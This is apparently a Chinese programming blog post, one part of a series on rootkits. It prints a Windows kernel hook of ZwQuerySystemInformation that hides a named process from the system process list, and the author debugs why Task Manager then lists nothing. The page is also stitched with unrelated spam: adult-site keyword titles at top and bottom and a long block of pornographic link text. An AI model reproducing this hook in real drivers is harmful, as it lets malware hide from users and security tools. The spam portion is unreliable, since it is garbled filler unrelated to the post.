青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運(yùn)轉(zhuǎn),開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理

HOOK SSDT Hide Process (七)

Posted on 2009-10-27 17:32 S.l.e!ep.¢% 閱讀(333) 評論(0)  編輯 收藏 引用 所屬分類: RootKit

[資料] http://m.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

HOOK SSDT Hide Process (六)??

下面這個函數(shù)有問題,運(yùn)行之后,Taskmgr.exe 里面的進(jìn)程列表估然顯示為空
NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????????????????IN?PVOID?SystemInformation,?
????????????????????????????????????IN?ULONG?SystemInformationLength,?
????????????????????????????????????OUT?PULONG?ReturnLength)?
// 定義自己的Hook函數(shù)
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
& process_name,?L " taskmgr.exe " );
????
????rc?
= ?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if (NT_SUCCESS(rc))?
????{
????????
????????
if ( 5 ? == ?SystemInformationClass)
????????{?
????????????
????????????
struct ?_SYSTEM_PROCESSES? * curr? = ?( struct ?_SYSTEM_PROCESSES? * )SystemInformation;?
????????????
struct ?_SYSTEM_PROCESSES? * prev? = ?NULL;?
????????????
????????????
if (curr -> NextEntryDelta)
????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);?
????????????
????????????
while (curr)
????????????{
????????????????
if ?(RtlEqualUnicodeString( & process_name,? & curr -> ProcessName,? 1 ))
????????????????{
????????????????????KdPrint((
" hide?process'name?taskmgr.exe " ));
????????????????????
????????????????????
if (prev)?
????????????????????{?
????????????????????????
if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????prev
-> NextEntryDelta? += ?curr -> NextEntryDelta;
????????????????????????}?
????????????????????????
else
????????????????????????{
????????????????????????????prev
-> NextEntryDelta? = ? 0 ;
????????????????????????}
????????????????????}
????????????????????
else
????????????????????{
????????????????????????
if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????SystemInformation?
= (PVOID)((ULONG)SystemInformation? + ?curr -> NextEntryDelta);
????????????????????????}
????????????????????????
else
????????????????????????{
????????????????????????????SystemInformation?
= ?NULL;
????????????????????????}
????????????????????}
????????????????????
????????????????????
if (curr -> NextEntryDelta)
????????????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
????????????????????
else
????????????????????{
????????????????????????curr?
= ?NULL;
????????????????????????
break ;
????????????????????}
????????????????????
????????????????}?
// ?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????
????????????????
if (curr? != ?NULL)
????????????????{
????????????????????prev?
= ?curr;
????????????????????
????????????????????
if (curr -> NextEntryDelta)
????????????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
????????????????????
else
????????????????????????curr?
= ?NULL;
????????????????????
????????????????}
// ?if(curr?!=?NULL)
????????????????
????????????}
// ?while(curr)?
????????????
????????}
// ?if(5?==?SystemInformationClass)
????????
????}
// ?if(NT_SUCCESS(rc))
????
????
// ?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
???? return ?rc;
}

使用自己的查詢進(jìn)程EXE(HOOK SSDT Hide Process (五) ),顯示結(jié)果是正常的

驅(qū)動中判斷的是 taskmgr.exe?,在遍歷時,taskmgr.exe 剛好在最好一個,把 NextEntryDelta 設(shè)置為 0 了
如果是其它的 abc.exe ,然后再打開 taskmgr.exe 是沒問題的

看來,HOOK SSDT Hide Process (五) 遍歷進(jìn)程的實(shí)現(xiàn) 跟 Taskmgr.exe 的實(shí)現(xiàn)有差異, 需要再找時間看下原因

MyZwQuerySystemInformation() 的實(shí)現(xiàn)來看,只是簡單地修改了下 NextEntryDelta ,并非真正意義上的'隱藏'
還是會把數(shù)據(jù)傳給用戶態(tài)。
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            在线观看欧美激情| 亚洲电影免费观看高清| 欧美日韩一区二区免费视频| 久久九九全国免费精品观看| 性做久久久久久久久| 亚洲欧美美女| 欧美激情视频网站| 一个色综合av| 一本色道久久加勒比精品| 日韩亚洲欧美精品| 亚洲制服欧美中文字幕中文字幕| 亚洲欧美成人一区二区在线电影 | 国产伦精品一区二区三区视频黑人 | 久久精品免费播放| 麻豆av一区二区三区久久| 欧美激情一区二区三区成人| 欧美视频日韩视频| 极品少妇一区二区三区| 亚洲欧洲精品一区二区精品久久久| 日韩午夜激情| 久久精品一区二区| 91久久久在线| 午夜精品区一区二区三| 牛夜精品久久久久久久99黑人| 欧美视频你懂的| 在线观看欧美成人| 欧美一区二区三区在线| 欧美成人69av| 亚洲女性裸体视频| 欧美精品免费视频| 国外成人在线视频| 亚洲影视在线播放| 亚洲国产精品福利| 欧美在现视频| 国产精品免费一区二区三区观看| 亚洲国产精彩中文乱码av在线播放| 亚洲视频欧美在线| 欧美电影打屁股sp| 欧美亚洲三级| 欧美午夜视频在线| 9l国产精品久久久久麻豆| 欧美+日本+国产+在线a∨观看| 亚洲自拍电影| 国产精品国产三级国产专播精品人 | 亚洲特级片在线| 欧美mv日韩mv国产网站app| 日韩视频一区二区三区在线播放免费观看 | 亚洲免费久久| 久久全球大尺度高清视频| 国产精品毛片va一区二区三区 | 狠狠色狠狠色综合| 午夜欧美精品| 亚洲视频一区二区| 欧美日韩成人综合天天影院| 亚洲国产高清在线| 欧美成人久久| 久久久www| 悠悠资源网亚洲青| 久久夜色精品亚洲噜噜国产mv| 亚洲午夜视频在线| 国产精品播放| 亚洲欧美日韩天堂| 亚洲一区二区三区国产| 国产精品久久久久久妇女6080| 亚洲午夜激情网页| 日韩一区二区免费看| 欧美人与禽猛交乱配| 久久久午夜视频| 国产午夜精品美女毛片视频| 久久精品99国产精品日本| 亚洲欧美日韩国产中文| 国产视频在线观看一区二区三区| 国产一区二区你懂的| 亚洲精品午夜精品| 亚洲国产精品一区二区第四页av | 香蕉久久国产| 亚洲天堂久久| 一区二区三区久久| 国产精品久久久久久久7电影| 亚洲欧美一区二区三区在线| 亚洲在线一区| 精品动漫3d一区二区三区| 欧美成黄导航| 欧美日韩国产小视频| 欧美在线关看| 久久视频一区| 夜夜嗨网站十八久久| 亚洲欧美日韩在线播放| 黄色成人91| 亚洲精品无人区| 国产人成一区二区三区影院| 免费在线观看成人av| 欧美日韩国产高清视频| 性色av一区二区三区在线观看| 久久精品人人做人人爽电影蜜月| 最近中文字幕日韩精品 | 亚洲国产一二三| 久久久久久穴| 中文av一区特黄| 亚洲欧美综合| 91久久精品久久国产性色也91 | 久久av二区| 亚洲最新视频在线播放| 亚洲制服欧美中文字幕中文字幕| 在线欧美日韩| 亚洲色图在线视频| 在线不卡视频| 亚洲欧美一区二区在线观看| 日韩视频在线观看免费| 欧美专区福利在线| 亚洲一二三区视频在线观看| 久久一区视频| 久久久久国产精品一区| 欧美日韩国产精品一卡| 欧美电影免费观看| 国内精品久久久久久| 亚洲午夜高清视频| 99成人精品| 美女诱惑一区| 蜜桃精品一区二区三区 | 国产精品h在线观看| 欧美va天堂在线| 国产亚洲综合在线| 一本一道久久综合狠狠老精东影业| 影音先锋成人资源站| 午夜久久久久久| 亚洲欧美另类中文字幕| 欧美日韩国产精品一卡| 亚洲国产精品专区久久| 亚洲第一在线综合网站| 久久精品一区| 久久亚洲综合色| 国产欧美在线观看| 午夜精品久久久久久久| 欧美中文字幕在线| 国产丝袜一区二区| 性色av香蕉一区二区| 久久国产精品久久w女人spa| 国产精品人人做人人爽人人添| 一区二区三区视频在线观看| 中国av一区| 国产精品久久久久久久久久久久久久| 亚洲美女网站| 亚洲视频导航| 欧美日韩一区三区| 夜久久久久久| 亚洲欧洲av一区二区| 欧美丝袜第一区| 正在播放欧美视频| 亚洲欧美日韩国产| 国产精品多人| 亚洲小说欧美另类社区| 欧美综合第一页| 国内自拍视频一区二区三区| 久久久久久久久蜜桃| 亚洲第一精品电影| 一区二区免费看| 国产精品一区在线观看| 久久动漫亚洲| 亚洲欧洲在线视频| 亚洲欧洲一区二区天堂久久 | 久久人人九九| 亚洲国产欧美另类丝袜| 欧美1区3d| 99精品欧美| 久久九九久久九九| 亚洲欧洲午夜| 欧美体内谢she精2性欧美| 亚洲欧美日韩国产成人| 噜噜噜在线观看免费视频日韩 | 亚洲精品乱码久久久久| 欧美午夜久久久| 性色一区二区三区| 亚洲国产三级网| 欧美在线亚洲一区| 亚洲国产精品热久久| 国产精品高清在线| 蜜臀av性久久久久蜜臀aⅴ| 亚洲深夜福利网站| 欧美国产欧美亚洲国产日韩mv天天看完整| 一本色道久久99精品综合| 国内精品视频在线观看| 欧美日韩综合网| 欧美aⅴ99久久黑人专区| 亚洲欧美视频一区二区三区| 亚洲国产日韩欧美在线99| 久久综合狠狠综合久久综青草 | 亚洲一区二区三区欧美| 亚洲第一区在线观看| 国产精品资源在线观看| 欧美精品久久久久久久久久| 久久久久久久久伊人| 亚洲男人天堂2024| 99视频一区二区| 亚洲电影免费在线| 久久综合中文色婷婷| 欧美在线观看一区| 亚洲免费在线视频| 一本一本久久a久久精品综合麻豆| 伊人久久亚洲美女图片|